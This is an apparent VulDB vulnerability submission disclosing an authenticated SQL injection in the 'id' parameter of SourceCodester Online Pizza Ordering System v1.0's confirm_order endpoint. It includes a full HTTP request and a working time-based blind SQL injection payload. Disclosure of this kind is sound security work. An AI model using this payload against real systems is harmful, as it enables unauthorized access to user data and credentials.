| Título | SourceCodester Online Pizza Ordering System SQL Injection via 'confirm_order' |
|---|
| Descrição | Affected Software:
SourceCodester Online Pizza Ordering System v1.0
https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html#comment-103391
Tested On:
Ubuntu Server 22.04.3 LTS
Affected URL:
http://x.x.x.x/php-opos/admin/ajax.php?action=confirm_order
Request:
POST /php-opos/admin/ajax.php?action=confirm_order HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 5
Origin: http://x.x.x.x
Connection: close
Referer: http://x.x.x.x/php-opos/admin/index.php?page=orders
Cookie: PHPSESSID=xxxxxxxxxxxxxxxxx
id=1
Affected Parameter:
id
Proof of Concept:
POST /php-opos/admin/ajax.php?action=confirm_order HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 5
Origin: http://x.x.x.x
Connection: close
Referer: http://x.x.x.x/php-opos/admin/index.php?page=orders
Cookie: PHPSESSID=xxxxxxxxxxxxxxxxx
id=1 AND (SELECT 5605 FROM (SELECT(SLEEP(15)))UTXE)
Impact:
SQL injection vulnerability can result in unauthorized access to restricted data such as user information and credentials.
Summary:
An authenticated remote SQL injection vulnerability exists in the SourceCodester Online Pizza Ordering System v1.0. The vulnerability is present in a POST request to the /admin/ajax.php?action=confirm_order page via the 'view order' functionality in /admin/index.php?page=orders. Due to improper input sanitization, a specially crafted packet that manipulates the 'id' parameter in the POST request leads to an SQL injection vulnerability, allowing malicious actors to view restricted data and extract the underlying database.
|
|---|
| Utilizador | simon.davis8080 (UID 54983) |
|---|
| Submissão | 05/10/2023 10h30 (há 3 anos) |
|---|
| Moderação | 05/10/2023 12h01 (2 hours later) |
|---|
| Estado | Aceite |
|---|
| Entrada VulDB | 241384 [SourceCodester Online Pizza Ordering System 1.0 ajax.php?action=confirm_order ID Injeção SQL] |
|---|
| Pontos | 17 |
|---|